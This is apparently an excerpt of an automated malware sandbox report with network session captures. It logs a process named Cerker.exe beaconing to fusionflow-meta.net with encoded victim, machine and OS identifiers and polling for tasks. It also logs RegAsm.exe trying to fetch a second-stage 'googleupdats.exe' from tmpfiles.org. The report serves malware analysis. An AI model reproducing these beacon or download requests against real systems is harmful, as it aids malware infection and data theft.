2024-08-31 20:42:07 UTC	149	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 62 66 64 38 35 66 36 63 38 33 63 33 34 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbfd85f6c83c344-EWRalt-svc: h3=":443"; ma=86400
2024-08-31 20:42:07 UTC	1369	IN	Data Raw: 31 39 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 Data Ascii: 19d1<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="preconnect" href="ht
2024-08-31 20:42:07 UTC	1369	IN	Data Raw: 23 65 64 66 32 66 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 37 2c 32 34 32 2c 32 34 37 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 74 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 2e 62 6f 72 64 65 72 2d 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 2e 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e Data Ascii: #edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;border-color:#cbd5e0;border-color:rgba(203,213,224,var(--border-opacity))}.border-t{border-top-width:1px}.border-r{border-right-width:1px}.flex{display:flex}.
2024-08-31 20:42:07 UTC	1369	IN	Data Raw: 72 61 79 2d 33 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 65 32 65 38 66 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 36 2c 32 33 32 2c 32 34 30 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 Data Ascii: ray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-op
2024-08-31 20:42:07 UTC	1369	IN	Data Raw: 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 35 25 29 3b 2d 77 65 62 Data Ascii: zier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-web
2024-08-31 20:42:07 UTC	1141	IN	Data Raw: 28 2d 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 37 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 61 35 35 36 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 34 2c 38 35 2c 31 30 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 Data Ascii: (--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity
2024-08-31 20:42:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49746	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:08 UTC	305	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache
2024-08-31 20:42:09 UTC	752	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rdw4Kc9OJzPC9HnJqEk86aouLRH4fCxEp1fQMqY3Q5fBzAJFtCxb6oCk4s%2BAWU%2FR0cPZFK0s4fK%2BMHMZAjlM9eTYMZe47%2BGDbfzd%2FZZVD7n8Q9nAXYFtUrE%2FVGGpmBGL%2FneZVfrg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd86e3b73424d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:09 UTC	409	IN	Data Raw: 31 39 32 0d 0a 35 66 39 61 64 65 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 34 65 64 38 63 38 61 66 63 61 37 34 39 33 37 31 33 35 37 35 35 34 32 39 30 66 36 36 0a 35 66 39 61 64 66 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 Data Ascii: 1925f9ade705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d4ed8c8afca749371357554290f665f9adf705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae55f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a067
2024-08-31 20:42:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49748	104.21.21.16	443	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:09 UTC	766	OUT	GET /dl/12050266/googleupdats.exe HTTP/1.1 Host: tmpfiles.org Cookie: XSRF-TOKEN=eyJpdiI6Ik5rOTRXbXJKQ3UxZm9tTk5GRnpGZmc9PSIsInZhbHVlIjoiUFI3Z0pORkEweFJqOXllNStmVlJOWWhBOUtHYkdBb3lXSFRncjNwdnB2NlZ3K3JTbVQ0TnJ4Z1RRK1lTcTBsUWlsQ3pnUUFFUnk1eE5ZM0t3ZnpHTE9FRDFzOVI0SUxYVzZoL1RHbE5peEQxSG1SQ0xvemZlUktzOEdqd2ViRmciLCJtYWMiOiI1ZjQzY2FhMWVjOWYyNGE3ZThlYjY4YjgxZmY0NjY5MTczY2U1MjQ0NDRhZWJjZjBmNzQ3N2JjZGJlNTkzZWJmIn0%3D; tmpfiles_session=eyJpdiI6IjgwM1pHV1MvT2N3Z2lLVFZZVWQ1NFE9PSIsInZhbHVlIjoiUE95bElQcGM0QmdYcUlGT3hGSGp0dThiL1AxWVc4SC82aFFnSnRieG0rTWpwN2VoZDA1bi9IMmJWT2pVZ2tiZ0kvcG9KWFk1Z2trUnR6NFdtd0ZpSE12RGZYZjdqQUNuMVNES09IMTUyOTZOcVZGNU56RklXbXRLZWFQN2tLZjgiLCJtYWMiOiI5ZWIyNzVmZTJjNjg3ODU1YzZjYTA3NjZiMDA2YjY3OWM1ZWQ1MDk1MTJlN2RlZTRkZTU0NDdhOTg2ZTU0OTg3In0%3D
2024-08-31 20:42:09 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 20:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6ImtZeFg4b0N5SmlCUUl2aHV6T1lvOXc9PSIsInZhbHVlIjoiQXVObjVrTlVKRVR6NUFyaElrQUFtSUhtZ0NiZVl4MERYcjAvb0FaaGVHdURmSVRnOWUrTnBNbWtFNTduUEZPV0x1bmp0b2d4L1dQRzcxUC91TmFUV1ovaXEybmswMHU4U2RteG4rQ2tDQU9EbE1VOFQ2L2c4RVVPeXhhV01KcDYiLCJtYWMiOiJiYWVlMjhmYjFmZmFiOWFkNjA0OTlhMmMxM2U1OGI2MTBiZDRhOTRiZjc3N2NiODNlY2EyMTdlMWRjNjY5NjE5In0%3D; expires=Sat, 31-Aug-2024 22:42:09 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6InBseGxERDJ0cHdMeWp3VkVSNFFFR0E9PSIsInZhbHVlIjoia1lUaDBmVit1bEVwTEJLQmdsd0FQQlExSlBpTlpSMlV1RzdkeW9tYmFzaWlxd3YwZW9qRmJLeEtmWTV4Z0xXU1I1ZktPemJxbHRJS1hWR3ptM1BmVFc2djNpaS9SbFZpOGxTNzRQVlVnRmVtSDN0K3NTeUdIWHBDcjk0TUIrQnciLCJtYWMiOiIyYjJiNWYzODZiZjZiOTFiMzgyYjlkZGI1MjIwMTg0OGIzYjNjNDkzODU1M2Y1YjYwOWZjNzJkMDdkN2VkZmM3In0%3D; expires=Sat, 31-Aug-2024 22:42:09 GMT; Max-Age=7200; path=/; httponly; samesite=lax Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08Gt17IvjeHRFClg0j3sj5z5Y1pxGnO%2FDUwhoboG2cYC4bsH7KVbWGeAs8uLIANh%2Bvh3dDoLuEgUYZtDyujIGie892rO6PoDFuOaIjDo4v2iYuS5IWNrOJXSs7QpxFY%3D"}],"group":"cf-nel","max_age":604800}
2024-08-31 20:42:09 UTC	149	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 62 66 64 38 37 30 30 39 39 65 34 32 34 66 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbfd870099e424f-EWRalt-svc: h3=":443"; ma=86400
2024-08-31 20:42:09 UTC	1369	IN	Data Raw: 31 39 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 Data Ascii: 19d1<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="preconnect" href="ht
2024-08-31 20:42:09 UTC	1369	IN	Data Raw: 23 65 64 66 32 66 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 37 2c 32 34 32 2c 32 34 37 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 74 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 2e 62 6f 72 64 65 72 2d 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 2e 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e Data Ascii: #edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;border-color:#cbd5e0;border-color:rgba(203,213,224,var(--border-opacity))}.border-t{border-top-width:1px}.border-r{border-right-width:1px}.flex{display:flex}.
2024-08-31 20:42:09 UTC	1369	IN	Data Raw: 72 61 79 2d 33 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 65 32 65 38 66 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 36 2c 32 33 32 2c 32 34 30 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 Data Ascii: ray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-op
2024-08-31 20:42:09 UTC	1369	IN	Data Raw: 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 35 25 29 3b 2d 77 65 62 Data Ascii: zier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-web
2024-08-31 20:42:09 UTC	1141	IN	Data Raw: 28 2d 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 37 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 61 35 35 36 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 34 2c 38 35 2c 31 30 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 Data Ascii: (--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity
2024-08-31 20:42:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49757	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:15 UTC	362	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADE HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
2024-08-31 20:42:15 UTC	702	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuqAUdzhbQDColcvct%2Fq9MP%2Bu6spXfjURRvM%2B%2BU5j8%2FVQa%2BP7uYgKHMCwEomhTiQvUqHG%2BYCESun7y0hl8sD7Jq4Sit%2Fhe3XfdI6F%2BCSa%2BSfTsgnzXVTaTAq%2Fv3RR4y2WsFIrobR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd895890f8c05-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:15 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:42:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49772	188.114.96.3	443	5900	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:42:20 UTC	305	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache
2024-08-31 20:42:21 UTC	744	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=St5WcdClwoSkxbM7do50zfBQDZkgMz4rhEHlkvtP9igljcD4yY3ZNI1AFypIJK20yLWolXSHYeLumpn%2B6Klw%2Fg1yQikHrxdF7MzFLg2JO%2FxYdVoMLhD9xJr8zVpVrtgI7GxVKL7r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd8b98e592361-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:42:21 UTC	310	IN	Data Raw: 31 32 66 0d 0a 35 66 39 61 64 66 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 35 66 39 61 64 30 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 36 37 39 62 63 36 34 34 33 66 37 61 61 36 61 33 62 37 37 61 38 64 36 32 63 32 63 34 61 33 63 61 36 65 38 61 32 35 37 65 36 38 34 39 33 30 35 33 33 61 65 35 0a 35 66 39 61 64 31 37 30 35 62 34 35 39 38 30 61 30 61 63 37 66 30 61 35 39 64 66 31 30 66 38 64 62 62 39 61 30 32 38 66 30 63 32 31 35 33 61 30 Data Ascii: 12f5f9adf705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae55f9ad0705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0679bc6443f7aa6a3b77a8d62c2c4a3ca6e8a257e684930533ae55f9ad1705b45980a0ac7f0a59df10f8dbb9a028f0c2153a0
2024-08-31 20:42:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49773	188.114.96.3	443	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
